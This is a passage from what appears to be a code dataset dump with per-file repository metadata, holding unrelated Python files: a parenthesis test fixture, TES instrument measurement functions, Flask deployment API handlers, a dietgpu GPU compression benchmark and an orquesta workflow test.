)())())(()))))())))))()((()(()(()))))()))((((())((())())(()))))()((()))(())((()()))()()((())(())())))(())))))()()(()())((()(())(((()((())))()())))()))()))))(())()(()))((()()()()))(())))(()()(())(((()(((()()))()((()))())()))(()(()))())))))))()((()(()))(((())())(())(()))(())(()((()))))))(()())(()()()(((()(((((()))((()))))(()))(())())(((()(()())(()()()()))())(()((()(()))()))())))(((()(()))))()))(()()((())())(()()())((()))(())))()()))(())))())))(()((())((()))((()))))())()()()((((((())((())()))(()))(())(())())))()())()((())))((()()())(()))(((()))())())))(())(())())()())()))((((()()()()))(())))((((())))(())(()((((()))())()))))))()()()))()
)))()((())))))((())())))()()(()()(()(()()()())((((())))(())(((())(()(()((((())(()()()(()(()((())(())(()())((((()((()((((((()((((())(((()())()((((()((())()(()(()(()((()()()(()(()())(((()(())(()(())(())(()))()((((((((()()(())))(()()(((())()(()(((((()())((()(())()())(((()(()(())()((((((((())()((()()((((())(((()(()((()((((()((((()(()(())())()(((()()))))))(()(((())()(((()())))((()))))(()()))))(()))))))((())())((())))()()()(()((()))()))()))()()()()()))(((((((()((()))((())()(()(()))()((((((((((((()(())))))(()())))()(()()(()(()()))))(((((()()((())()))())()()()))(())())()())()()((()()(()(()()(()))))))()()))(()()((()))))()((()()()())))(((()(((()()(())(())(()(((())(()((()(()))(()()((())()(()()())()))))))(()()((())((()())))(())(()))()(()))(()))()))()(())()(()())))(()))(()()(((()))))())))))((())())))))()()()))(()))((()())())()()))(((())((()((())()(()))()((()))()(())))))))()()())())))(()()(())(()))(())))))()(()))(()()))))))))((((()()()()()))(()))((()((())))(()())(((()()()(())))))()))()())())(()()()))))))((()())))((())))(())()((()))()(()())())))))(((()()(()(())()())(((((()))((()(())(())))))))()()))))))((()((((()()))()))(()()))(()()(())))))(((()()))(()())))(())()((()((()(((()()()()((()())())(()(((((((()((((())(()((((()()(())))))(()())))))(()())))())(())))((()(()))(()())(((())))((((())))))((()))()(((((((())())())((())))))))(()))))))))()((()()())((())))(())))((()(((()(())(())))()()()()))(())(()(())()())(())))()())((()((()((()()((())())))(()((())()()))()))((()()(()))(((((((()))((())((())((())()()((((((((()())()()()))(()()(((()(())()))()))()))()()(()(((((()))))((())(((()))()((((((((()()()()(()))()(()))()(())))))))()((((()()((()(())()((()))((()()(()()))))))))))(())(()))()()((((())))()((())(()((()((()(())()))()()((((()))))()))())))))())(((()()))()))()(()))(()))()((()((((((())())))()))()((())(()(())))))))()))(()()()())())()))((()))(()((()((()())))))((((())()()())(())())()((()((()())()())()(()))))((()())))()))()()))))()((())))())(()))()))(()((())(()))))()()))(()()((((()()))(((()()())(()(()
(((()))())))((((()())()()()(())()()()((()))))((()()(()()))()())))(((((()(())())))))(()))))())))(())())()))))((()))))))(((())(((())()(((())))(()))()())(((()(()(((()))))()(()()(())())))))())())()()((())))()(())((()))((())(()())(()()()(()()())((())())))))((()(()())()()))))(()()(()()()(()()))((((((()))(()())(())(())())((())(()(()))((()()(()))))()))()(())))())))())(()((())))((())(()()()(()))((()((((((()())()()))))()))((()((())()))()((((()()()(((())())))()()()())())())(()())()))()(())(())()))())((()(((((()))(())(((((()))(()())(()(()(())()((()(()(()))()(()))))()(((())(()((((((()))(()(((()()())()())((()())))((()((()())()((((((())()))(()))))(()()()()))())())((((((((())((((()()()))(())()()))(()(()()(()(()))))(()))(()()()(())()()(())(()))())((()()((()(()))()))))())((()())())(((((()(()()))((()()()))()()(()(()(((()())(((((((((()))()())(()(()(())(((((()()))))(()())(()())())(())))))((()))())(((()((((()))()))(()(()(((()()(()(((()()))(())))((((()(()()))))((((()()())()))())()))))((())((((((())()()))()))()(((()((())(()((((()())())((((((((((()(((((()())()()(()))))))()((((())())(((()()((((()()())()(((((())))()))(())())(((()(((())()))()()()()(())))(()(((()(()))())))()(((()()()()()(()(((()(((()))()(())(())()()))()((()))))))()(((((()(()()((())(())((())))()(()())(())))())((())(()(()()(((())((()()(()()((()))))())))()(()))()))))))())())))((((((()())))(())(()))()()))()(())))))))((()))(()()()()))()())()()()()))()()())))))))((())(())))(()))(())((()())))(()(((()))((((())())))(())((())())))))(((()())(())()(())))((()()()((()(()))()))(())))((()(()()((()()()))((()))((()))()))(()())()()(((((((((()(()))()())()((())((((((((()(())()(((()((())()((((((((()))())))(()((()((())())())((()()())))(()(()((((((()))))((((())))((()()(())()())()()())(())(((()(()()(())(((())((((())()()(()()(((())()(())((()(()(((()(()())))()))((()()())(())))))(()(()))()))()(()))))(()((()))()())(())(())(()))((()())()))())()())((((()))))())())(((()))(((()()((()((())(())()()))))(((()((((()(((((((((())()()()(())((()(()()(()()(()()(())()())
(((((()))))()(())(((()((((()())(()(((()))))()))())((((()()((()(()))))((())(())(()(()))()()(((()))(((((((((()())))((())()(()(((((((()))))))()()(())(((()(()())()()))((()()))((((()(())())))((()())))))()))))))))()()(((())())((()))())((())((()()))())((((((((())((()((())())))))()()))))))()()(())))))()))()()(((()))))(())((((()()()()))((()((((()()(())(((((()())()))))))())())()((((((((((()))()))((()))(())())(()(()(())((()()(()((())(())((((())(()()(()((()((()(((((()(()()((((())(())())(()()())()())((()(())()(())()))))") | 872.733333 | 12,518 | 0.03025 | 42 | 13,091 | 9.238095 | 0.214286 | 0.226804 | 0.878866 | 0.927835 | 0.878866 | 0.878866 | 0.878866 | 0.878866 | 0.878866 | 0.878866 | 0 | 0 | 0.006187 | 13,091 | 15 | 12,518 | 872.733333 | 0.029823 | 0 | 0 | 0 | 0 | 0 | 0.959288 | 0.954934 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.071429 | null | null | 0.785714 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 16 |
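The `Solution.longestValidParentheses` implementation itself is not shown in this file; a standard stack-of-indices approach (a sketch, not necessarily this repo's method) reproduces the expected answers for the short inputs above:

```python
def longest_valid_parentheses(s):
    """Length of the longest valid '()' substring, O(n) with an index stack."""
    stack = [-1]                      # index just before the current valid run
    best = 0
    for i, ch in enumerate(s):
        if ch == '(':
            stack.append(i)
        else:
            stack.pop()               # try to match this ')'
            if stack:
                best = max(best, i - stack[-1])
            else:
                stack.append(i)       # unmatched ')': new base index
    return best

print(longest_valid_parentheses("(()()"))   # 4
print(longest_valid_parentheses("()(())"))  # 6
```

Keeping the index below the current valid run on the stack means the length of any completed match is always a simple difference of indices.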
b1e9ecb7077073da110feb44a637ac676ceb48b2 | 5,078 | py | Python | tes/data_acquisition.py | Leo-am/tespackage | 1e3447951532411eb3596c6dbeaf781c4b006676 | [
"MIT"
] | null | null | null | tes/data_acquisition.py | Leo-am/tespackage | 1e3447951532411eb3596c6dbeaf781c4b006676 | [
"MIT"
] | null | null | null | tes/data_acquisition.py | Leo-am/tespackage | 1e3447951532411eb3596c6dbeaf781c4b006676 | [
"MIT"
] | null | null | null | """
Module used to perform measurements with the TES.
Functions:
1) trace_drive
2) pulse_drive
"""
import yaml
from tes.registers import Registers
from tes.data import capture
def trace_drive(time, channel, p_thres, s_thres,
baseline_sub, datapath, filename):
"""
Record TES traces.
Parameters
----------
time : int
Time in seconds to take measurements.
channel : int
Processing channel chosen to take measurements.
p_thres : int
Pulse threshold chosen using the MCA.
s_thres : int
Slope threshold chosen using the MCA.
baseline_sub : bool
If True, the baseline correction will be activated.
It can automatically update the baseline level in
the case where it changes.
datapath : str
Folder where the registers will be saved.
filename : str
Name of the file where the registers will be saved.
Returns
-------
None
Notes
-----
Keep trace measurements to 1 minute or less.
"""
r = Registers('tcp://smp-loophole.instrument.net.uq.edu.au:10001')
time_measurement = time/(r.tick_period*4e-9)
print(time_measurement)
r.baseline[channel].subtraction = baseline_sub
# disabling all event registers
r.event.enable = False
# trace settings
r.event[channel].packet = 'trace'
r.event[channel].trace = 0
r.event[channel].trace_type = 'single'
r.event[channel].trace_sequence = 0
r.event[channel].trace_stride = 5
r.event[channel].trace_pre = 512
r.event[channel].trace_length = 2048
# event settings
r.event[channel].timing = 0
r.event[channel].max_rises = 1
r.event[channel].height = 'peak'
r.event[channel].pulse_threshold = p_thres
r.event[channel].slope_threshold = s_thres
r.event[channel].area_threshold = 0
# inform user about baseline subtraction
if r.baseline[channel].subtraction:
print('bl on')
measurement = (
'trace-pulse_BL-{!r}-{!r}-'
.format(r.event[channel].timing, r.event[channel].height)
)
else:
print('bl off')
measurement = (
'trace-pulse-{!r}-{!r}-'
.format(r.event[channel].timing, r.event[channel].height)
)
# Making measurements
r.event.enable = True
# limit to 1 min as no dropped frames
c = capture(filename, measurement, ticks=time_measurement)
r.event.enable = False
# saving registers
fname = '{}{}/{}_reg.yml'.format(datapath, filename, measurement)
f = open(fname, 'w+')
f.write(yaml.dump(dict(r.all)))
f.close()
# checking what has been done
print(measurement)
print(c)
def pulse_drive(time, channel, p_thres, s_thres,
baseline_sub, datapath, filename):
"""
Perform measurements over TES traces.
Measure the following characteristics of TES traces:
1) Length
2) Area
3) Maximum slope or height
4) Rise Time
Parameters
----------
time : int
Time in seconds to take measurements.
channel : int
Processing channel chosen to take measurements.
p_thres : int
Pulse threshold chosen using the MCA.
s_thres : int
Slope threshold chosen using the MCA.
baseline_sub : bool
If True, the baseline correction will be activated.
It can automatically update the baseline level in
the case where it changes.
datapath : str
Folder where the registers will be saved.
filename : str
Name of the file where the registers will be saved.
Returns
-------
None
"""
r = Registers('tcp://smp-loophole.instrument.net.uq.edu.au:10001')
time_measurement = time/(r.tick_period*4e-9)
print(time_measurement)
r.baseline[channel].subtraction = baseline_sub
# disabling all event registers
r.event.enable = False
# trace settings
r.event[channel].packet = 'pulse'
# event settings
r.event[channel].timing = 0
r.event[channel].max_rises = 1
r.event[channel].height = 'peak'
r.event[channel].pulse_threshold = p_thres
r.event[channel].slope_threshold = s_thres
r.event[channel].area_threshold = 0
# inform user about baseline subtraction
if r.baseline[channel].subtraction:
print('bl on')
measurement = (
'-pulse_BL-{!r}-{!r}-test3'
.format(r.event[channel].timing, r.event[channel].height)
)
else:
print('bl off')
measurement = (
'-pulse-{!r}-{!r}-test3'
.format(r.event[channel].timing, r.event[channel].height)
)
# Making measurements
r.event.enable = True
c = capture(filename, measurement, ticks=time_measurement)
r.event.enable = False
# saving registers
fname = '{}{}/{}_reg.yml'.format(datapath, filename, measurement)
f = open(fname, 'w+')
f.write(yaml.dump(dict(r.all)))
f.close()
# checking what has been done
print(measurement)
print(c)
| 25.39 | 70 | 0.625837 | 646 | 5,078 | 4.846749 | 0.239938 | 0.065155 | 0.116257 | 0.034494 | 0.836155 | 0.824018 | 0.824018 | 0.824018 | 0.824018 | 0.824018 | 0 | 0.010735 | 0.266247 | 5,078 | 199 | 71 | 25.517588 | 0.829576 | 0.363529 | 0 | 0.734177 | 0 | 0 | 0.091275 | 0.06443 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025316 | false | 0 | 0.037975 | 0 | 0.063291 | 0.126582 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3cf2b6d19af7c929fbc9aaa1e0a2a8e7766f9a60 | 164 | py | Python | modules/tests/test_pokemon.py | superbahbi/JARVIS-on-Messenger | a9ceffff7fd90e7149d51211b43d2b6e1003f63f | [
"MIT"
] | null | null | null | modules/tests/test_pokemon.py | superbahbi/JARVIS-on-Messenger | a9ceffff7fd90e7149d51211b43d2b6e1003f63f | [
"MIT"
] | null | null | null | modules/tests/test_pokemon.py | superbahbi/JARVIS-on-Messenger | a9ceffff7fd90e7149d51211b43d2b6e1003f63f | [
"MIT"
] | null | null | null | import modules
def test_hello():
assert('pokemon' == modules.process_query('notify')[0])
assert('pokemon' != modules.process_query('something random')[0])
| 27.333333 | 69 | 0.70122 | 20 | 164 | 5.6 | 0.65 | 0.232143 | 0.357143 | 0.482143 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013889 | 0.121951 | 164 | 5 | 70 | 32.8 | 0.763889 | 0 | 0 | 0 | 0 | 0 | 0.219512 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a715457722503daa6e285efb408bff2985a3675d | 128 | py | Python | back/graphql/__init__.py | 8area8/plenkton-api | b4b7ed5f7ac3a2c87e8dacf1d6c43b9d3d53796e | [
"MIT"
] | null | null | null | back/graphql/__init__.py | 8area8/plenkton-api | b4b7ed5f7ac3a2c87e8dacf1d6c43b9d3d53796e | [
"MIT"
] | 32 | 2022-02-12T20:16:46.000Z | 2022-03-31T23:07:22.000Z | back/graphql/__init__.py | 8area8/plenkton-api | b4b7ed5f7ac3a2c87e8dacf1d6c43b9d3d53796e | [
"MIT"
] | null | null | null | """Graphql package.
https://strawberry.rocks/docs/integrations/fastapi
https://strawberry.rocks/docs/integrations/pydantic
"""
| 21.333333 | 51 | 0.789063 | 14 | 128 | 7.214286 | 0.642857 | 0.29703 | 0.39604 | 0.475248 | 0.712871 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046875 | 128 | 5 | 52 | 25.6 | 0.827869 | 0.9375 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5957e966677af80b8e4a085286cd24e535e9fb68 | 2,808 | py | Python | src/integration-provider/qai_testbed_integration_provider/controllers/api/deploy_dag.py | ads-ad-itcenter/qunomon.forked | 48d532692d353fe2d3946f62b227f834f9349034 | [
"Apache-2.0"
] | 16 | 2020-11-18T05:43:55.000Z | 2021-11-27T14:43:26.000Z | src/integration-provider/qai_testbed_integration_provider/controllers/api/deploy_dag.py | aistairc/qunomon | d4e9c5cb569b16addfbe6c33c73812065065a1df | [
"Apache-2.0"
] | 1 | 2022-03-23T07:55:54.000Z | 2022-03-23T13:24:11.000Z | src/integration-provider/qai_testbed_integration_provider/controllers/api/deploy_dag.py | ads-ad-itcenter/qunomon.forked | 48d532692d353fe2d3946f62b227f834f9349034 | [
"Apache-2.0"
] | 3 | 2021-02-12T01:56:31.000Z | 2022-03-23T02:45:02.000Z | # Copyright © 2019 National Institute of Advanced Industrial Science and Technology (AIST). All rights reserved.
from flask import request
from flask_restful import Resource
from injector import inject
from qlib.utils.logging import get_logger, log
from ...usecases.deploy_dag import DeployDAGService
from ..dto import ResultSchema, Result
from ...across.exception import QAIException
logger = get_logger()
class DeployDAGAPI(Resource):
@inject
def __init__(self, service: DeployDAGService):
self.service = service
# @jwt_required()
# @helpers.standardize_api_response
# TODO: convert to an annotation (decorator)
@log(logger)
def post(self):
try:
res = self.service.post(request)
return ResultSchema().dump(res), 200
except QAIException as e:
logger.exception('Raise Exception: %s', e)
return ResultSchema().dump(e.to_result()), e.status_code
except Exception as e:
logger.exception('Raise Exception: %s', e)
return ResultSchema().dump(Result(code='D99999', message='internal server error: {}'.format(e))), 500
class DeployDAGAsyncAPI(Resource):
@inject
def __init__(self, service: DeployDAGService):
self.service = service
# @jwt_required()
# @helpers.standardize_api_response
# TODO: convert to an annotation (decorator)
@log(logger)
def post(self):
try:
res = self.service.post(request, is_async_build=True)
return ResultSchema().dump(res), 200
except QAIException as e:
logger.exception('Raise Exception: %s', e)
return ResultSchema().dump(e.to_result()), e.status_code
except Exception as e:
logger.exception('Raise Exception: %s', e)
return ResultSchema().dump(Result(code='D99999', message='internal server error: {}'.format(e))), 500
# @jwt_required()
# @helpers.standardize_api_response
# TODO: convert to an annotation (decorator)
@log(logger)
def get(self):
res = self.service.get_async()
return ResultSchema().dump(res), 200
class DeployDAGNonBuildAPI(Resource):
@inject
def __init__(self, service: DeployDAGService):
self.service = service
# @jwt_required()
# @helpers.standardize_api_response
# TODO: convert to an annotation (decorator)
@log(logger)
def post(self):
try:
res = self.service.post(request, is_build=False)
return ResultSchema().dump(res), 200
except QAIException as e:
logger.exception('Raise Exception: %s', e)
return ResultSchema().dump(e.to_result()), e.status_code
except Exception as e:
logger.exception('Raise Exception: %s', e)
return ResultSchema().dump(Result(code='D99999', message='internal server error: {}'.format(e))), 500
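The three resource classes above repeat the same try/except response handling verbatim, which is exactly what the `# TODO` comments (and the commented-out `helpers.standardize_api_response`) suggest factoring into a decorator. Below is a hedged, self-contained sketch of that refactoring; `QAIException` and the response dict shapes are stand-ins for the project's real `ResultSchema`/`Result` types, not the actual qunomon API.

```python
# Sketch only: stand-ins for the project's QAIException / Result types.
import functools


class QAIException(Exception):
    """Stand-in for the project's domain exception."""

    def __init__(self, message, status_code=400):
        super().__init__(message)
        self.message = message
        self.status_code = status_code


def standardize_api_response(func):
    """Wrap a handler so exceptions map to (payload, status) tuples."""

    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs), 200
        except QAIException as e:
            # Domain errors carry their own status code.
            return {'code': 'D00001', 'message': e.message}, e.status_code
        except Exception as e:
            # Last-resort handler, mirroring the D99999 branch above.
            return {'code': 'D99999',
                    'message': 'internal server error: {}'.format(e)}, 500

    return wrapper


@standardize_api_response
def post():
    raise QAIException('dag already deployed', status_code=409)
```

With this shape, each `post()` body shrinks to the single service call, and the error mapping lives in one place.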
| 31.909091 | 113 | 0.649217 | 319 | 2,808 | 5.598746 | 0.253919 | 0.06159 | 0.12318 | 0.06047 | 0.7486 | 0.732923 | 0.732923 | 0.732923 | 0.732923 | 0.732923 | 0 | 0.018753 | 0.240385 | 2,808 | 87 | 114 | 32.275862 | 0.818097 | 0.133191 | 0 | 0.719298 | 0 | 0 | 0.085537 | 0 | 0 | 0 | 0 | 0.011494 | 0 | 1 | 0.122807 | false | 0 | 0.122807 | 0 | 0.473684 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
59a84dd3df1292b8e2f4fb5d65a05f6473bfd658 | 6,920 | py | Python | dietgpu/benchmark.py | facebookresearch/dietgpu | 182ba5aa39643fcf8325e5a3326c0f1c2ffa6ab9 | [
"MIT"
] | 190 | 2022-01-31T17:09:34.000Z | 2022-03-24T23:22:12.000Z | dietgpu/benchmark.py | facebookresearch/dietgpu | 182ba5aa39643fcf8325e5a3326c0f1c2ffa6ab9 | [
"MIT"
] | 1 | 2022-03-09T05:21:37.000Z | 2022-03-09T05:41:54.000Z | dietgpu/benchmark.py | facebookresearch/dietgpu | 182ba5aa39643fcf8325e5a3326c0f1c2ffa6ab9 | [
"MIT"
] | 10 | 2022-01-31T18:02:09.000Z | 2022-03-09T05:20:45.000Z | # Copyright (c) (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# Simple benchmarking script for both float and raw byte-wise ANS codecs in
# PyTorch using the asynchronous API, as applied to floating point data
# ~ N(0, 1)
import torch
torch.ops.load_library("//dietgpu:dietgpu")
dev = torch.device("cuda:0")
def calc_comp_ratio(input_ts, out_sizes):
total_input_size = 0
total_comp_size = 0
for t, s in zip(input_ts, out_sizes):
total_input_size += t.numel() * t.element_size()
total_comp_size += s
return total_input_size, total_comp_size, total_comp_size / total_input_size
def get_float_comp_timings(ts, num_runs=3):
tempMem = torch.empty([384 * 1024 * 1024], dtype=torch.uint8, device=dev)
comp_time = 0
decomp_time = 0
total_size = 0
comp_size = 0
# ignore first run timings
for i in range(1 + num_runs):
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
rows, cols = torch.ops.dietgpu.max_float_compressed_output_size(ts)
comp = torch.empty([rows, cols], dtype=torch.uint8, device=dev)
sizes = torch.zeros([len(ts)], dtype=torch.int, device=dev)
start.record()
comp, sizes, memUsed = torch.ops.dietgpu.compress_data(
True, ts, tempMem, comp, sizes
)
end.record()
comp_size = 0
torch.cuda.synchronize()
if i > 0:
comp_time += start.elapsed_time(end)
total_size, comp_size, _ = calc_comp_ratio(ts, sizes)
out_ts = []
for t in ts:
out_ts.append(torch.empty(t.size(), dtype=t.dtype, device=t.device))
# this takes a while
comp_ts = [*comp]
out_status = torch.empty([len(ts)], dtype=torch.uint8, device=dev)
out_sizes = torch.empty([len(ts)], dtype=torch.int32, device=dev)
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.ops.dietgpu.decompress_data(
True, comp_ts, out_ts, tempMem, out_status, out_sizes
)
end.record()
torch.cuda.synchronize()
if i > 0:
decomp_time += start.elapsed_time(end)
# validate
for a, b in zip(ts, out_ts):
assert torch.equal(a, b)
comp_time /= num_runs
decomp_time /= num_runs
return comp_time, decomp_time, total_size, comp_size
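The timing loop above runs `1 + num_runs` iterations and only accumulates when `i > 0`, so the first (warm-up) run is excluded before averaging. A pure-Python sketch of that warm-up-exclusion pattern, with made-up timings rather than CUDA event measurements:

```python
def average_excluding_warmup(run_once, num_runs=3):
    """Run 1 + num_runs iterations, discard the first, average the rest."""
    total = 0.0
    for i in range(1 + num_runs):
        elapsed = run_once(i)
        if i > 0:  # iteration 0 is the warm-up run
            total += elapsed
    return total / num_runs


# Hypothetical timings: the first (warm-up) run is much slower.
timings = [50.0, 10.0, 10.0, 10.0]
avg = average_excluding_warmup(lambda i: timings[i], num_runs=3)
```

Excluding the warm-up run avoids folding one-time costs (kernel compilation, allocator warm-up) into the reported average.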
def get_any_comp_timings(ts, num_runs=3):
tempMem = torch.empty([384 * 1024 * 1024], dtype=torch.uint8, device=dev)
comp_time = 0
decomp_time = 0
total_size = 0
comp_size = 0
# ignore first run timings
for i in range(1 + num_runs):
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
rows, cols = torch.ops.dietgpu.max_any_compressed_output_size(ts)
comp = torch.empty([rows, cols], dtype=torch.uint8, device=dev)
sizes = torch.zeros([len(ts)], dtype=torch.int, device=dev)
start.record()
comp, sizes, memUsed = torch.ops.dietgpu.compress_data(
False, ts, tempMem, comp, sizes
)
end.record()
comp_size = 0
torch.cuda.synchronize()
if i > 0:
comp_time += start.elapsed_time(end)
total_size, comp_size, _ = calc_comp_ratio(ts, sizes)
out_ts = []
for t in ts:
out_ts.append(torch.empty(t.size(), dtype=t.dtype, device=t.device))
# this takes a while
comp_ts = [*comp]
out_status = torch.empty([len(ts)], dtype=torch.uint8, device=dev)
out_sizes = torch.empty([len(ts)], dtype=torch.int32, device=dev)
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.ops.dietgpu.decompress_data(
False, comp_ts, out_ts, tempMem, out_status, out_sizes
)
end.record()
torch.cuda.synchronize()
if i > 0:
decomp_time += start.elapsed_time(end)
# validate
for a, b in zip(ts, out_ts):
assert torch.equal(a, b)
comp_time /= num_runs
decomp_time /= num_runs
return comp_time, decomp_time, total_size, comp_size
for dt in [torch.bfloat16, torch.float16, torch.float32]:
# Non-batched
ts = []
ts.append(torch.normal(0, 1.0, [128 * 512 * 1024], dtype=dt, device=dev))
c, dc, total_size, comp_size = get_float_comp_timings(ts)
ratio = comp_size / total_size
c_bw = (total_size / 1e9) / (c * 1e-3)
dc_bw = (total_size / 1e9) / (dc * 1e-3)
print("Float codec non-batched perf [128 * 512 * 1024] {}".format(dt))
print(
"comp time {:.3f} ms B/W {:.1f} GB/s, compression {} -> {} bytes ({:.4f}x) ".format(
c, c_bw, total_size, comp_size, ratio
)
)
print("decomp time {:.3f} ms B/W {:.1f} GB/s".format(dc, dc_bw))
# Batched
ts = []
for i in range(128):
ts.append(torch.normal(0, 1.0, [512 * 1024], dtype=dt, device=dev))
c, dc, total_size, comp_size = get_float_comp_timings(ts)
ratio = comp_size / total_size
c_bw = (total_size / 1e9) / (c * 1e-3)
dc_bw = (total_size / 1e9) / (dc * 1e-3)
print("Float codec batched perf [128, [512 * 1024]] {}".format(dt))
print(
"comp time {:.3f} ms B/W {:.1f} GB/s, compression {} -> {} bytes ({:.4f}x) ".format(
c, c_bw, total_size, comp_size, ratio
)
)
print("decomp time {:.3f} ms B/W {:.1f} GB/s".format(dc, dc_bw))
print("\n")
for dt in [torch.bfloat16, torch.float16, torch.float32]:
# Non-batched
ts = []
ts.append(torch.normal(0, 1.0, [128 * 512 * 1024], dtype=dt, device=dev))
c, dc, total_size, comp_size = get_any_comp_timings(ts)
ratio = comp_size / total_size
c_bw = (total_size / 1e9) / (c * 1e-3)
dc_bw = (total_size / 1e9) / (dc * 1e-3)
print("Raw ANS byte-wise non-batched perf [128 * 512 * 1024] {}".format(dt))
print(
"comp time {:.3f} ms B/W {:.1f} GB/s, compression {} -> {} bytes ({:.4f}x) ".format(
c, c_bw, total_size, comp_size, ratio
)
)
print("decomp time {:.3f} ms B/W {:.1f} GB/s".format(dc, dc_bw))
# Batched
ts = []
for i in range(128):
ts.append(torch.normal(0, 1.0, [512 * 1024], dtype=dt, device=dev))
c, dc, total_size, comp_size = get_any_comp_timings(ts)
ratio = comp_size / total_size
c_bw = (total_size / 1e9) / (c * 1e-3)
dc_bw = (total_size / 1e9) / (dc * 1e-3)
print("Raw ANS byte-wise batched perf [128, [512 * 1024]] {}".format(dt))
print(
"comp time {:.3f} ms B/W {:.1f} GB/s, compression {} -> {} bytes ({:.4f}x) ".format(
c, c_bw, total_size, comp_size, ratio
)
)
print("decomp time {:.3f} ms B/W {:.1f} GB/s".format(dc, dc_bw))
| 30.892857 | 94 | 0.601012 | 1,026 | 6,920 | 3.88499 | 0.145224 | 0.058705 | 0.039137 | 0.051179 | 0.875063 | 0.86277 | 0.846212 | 0.831661 | 0.831661 | 0.811089 | 0 | 0.040828 | 0.26026 | 6,920 | 223 | 95 | 31.03139 | 0.737839 | 0.067197 | 0 | 0.718121 | 0 | 0.026846 | 0.106089 | 0 | 0 | 0 | 0 | 0 | 0.013423 | 1 | 0.020134 | false | 0 | 0.006711 | 0 | 0.04698 | 0.087248 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
59d192c8c0a594e128dd414ef275adac229f7f5e | 39,326 | py | Python | orquesta/tests/unit/conducting/test_workflow_conductor.py | batk0/orquesta | f03f3f2f3820bf111a9277f4f6c5d6c83a89d004 | [
"Apache-2.0"
] | null | null | null | orquesta/tests/unit/conducting/test_workflow_conductor.py | batk0/orquesta | f03f3f2f3820bf111a9277f4f6c5d6c83a89d004 | [
"Apache-2.0"
] | null | null | null | orquesta/tests/unit/conducting/test_workflow_conductor.py | batk0/orquesta | f03f3f2f3820bf111a9277f4f6c5d6c83a89d004 | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from orquesta import conducting
from orquesta import events
from orquesta import exceptions as exc
from orquesta import graphing
from orquesta.specs import native as specs
from orquesta import states
from orquesta.tests.unit import base
from orquesta.utils import dictionary as dx
class WorkflowConductorTest(base.WorkflowConductorTest):
def _prep_conductor(self, context=None, inputs=None, state=None):
wf_def = """
version: 1.0
description: A basic sequential workflow.
input:
- a
- b: False
output:
- data:
a: <% ctx().a %>
b: <% ctx().b %>
c: <% ctx().c %>
tasks:
task1:
action: core.noop
next:
- when: <% succeeded() %>
publish:
- c: 'xyz'
do: task2
task2:
action: core.noop
next:
- when: <% succeeded() %>
do: task3
task3:
action: core.noop
next:
- when: <% succeeded() %>
do: task4
task4:
action: core.noop
next:
- when: <% succeeded() %>
do: task5
task5:
action: core.noop
"""
spec = specs.WorkflowSpec(wf_def)
kwargs = {
'context': context if context is not None else None,
'inputs': inputs if inputs is not None else None
}
conductor = conducting.WorkflowConductor(spec, **kwargs)
self.assertIsNone(conductor._graph)
self.assertIsInstance(conductor.graph, graphing.WorkflowGraph)
self.assertIsNone(conductor._flow)
self.assertIsInstance(conductor.flow, conducting.TaskFlow)
if state:
self.assertEqual(conductor._workflow_state, states.UNSET)
self.assertEqual(conductor.get_workflow_state(), states.UNSET)
conductor.request_workflow_state(state)
self.assertEqual(conductor._workflow_state, state)
self.assertEqual(conductor.get_workflow_state(), state)
else:
